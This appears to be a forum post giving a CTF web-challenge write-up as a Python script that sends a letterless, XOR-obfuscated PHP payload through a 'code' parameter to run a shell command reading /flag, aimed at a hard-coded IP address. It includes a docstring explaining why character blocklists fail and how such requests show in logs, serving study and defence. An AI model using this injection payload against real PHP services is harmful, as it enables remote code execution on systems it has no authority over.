roger 发表于 2021-4-6 22:56:35

web_clock_writeup



exp:
import re
import requests


def exp(ip,port):
    """Request the challenge's index.php with a crafted ``code`` parameter and report any flag in the reply.

    The query string carries PHP source written without letters or digits.
    Each ``"..."^"..."`` pair is a XOR of two string literals; the results are
    stored in variables and then used as a function name and its argument.
    Decoded, the payload calls a shell-execution function to print ``/flag``.
    NOTE(review): that this works implies the server evaluates ``code`` as PHP
    behind a character filter; the server source is not on this page, so
    treat that as an inference.

    Defensive reading: a character blocklist does not make evaluating request
    data safe, because operators on string literals can rebuild any identifier.
    A ``code`` value dense with ``^``, ``${`` and quotes but containing no
    alphanumerics is a usable signal in request logs.

    Args:
        ip: Host name or address of the challenge instance.
        port: TCP port of the web service.

    Returns:
        A message containing the text that follows the first ``flag`` match,
        a "not found" message when the response has no match, or the caught
        exception object itself when the request fails.
    """
    # Percent-encoded (%22 is a double quote, %3E is '>', %3C is '<') so the
    # PHP quotes and comparison characters survive inside the URL.
    poc = '/index.php?code=${%22!%22^%22~%22}=%22[][][@%22^%22($()%3E-%22;${%22(%22^%22)%22}=%22]]]]%22^%22%3E%3C)}%22;${%22{%22^%22}%22}=%22]@:]%22^%22;,[:%22;${%22!%22^%22~%22}(${%22(%22^%22)%22}.%22/%22.${%22{%22^%22}%22});'
    target = ''.join(('http://', str(ip), ':', str(port), str(poc)))
    # Browser-like User-Agent in place of the requests library default.
    browser_headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0'}
    try:
        reply = requests.get(url=target, headers=browser_headers, timeout=2)
        # '.' does not cross newlines, so the capture is the rest of the line
        # after the first "flag".
        found = re.search('flag(.*)', reply.text)
        if found is None:
            return "未能读取到flag"
        return "获取flag为:" + str(found.group(1))
    except Exception as ex:
        # Returned rather than raised; the caller prints whatever comes back.
        return ex


if __name__ == "__main__":
    # Address and port of the challenge instance are fixed here rather than
    # read from the command line.
    ip, port = '123.57.255.244', 80
    print(exp(ip, port))
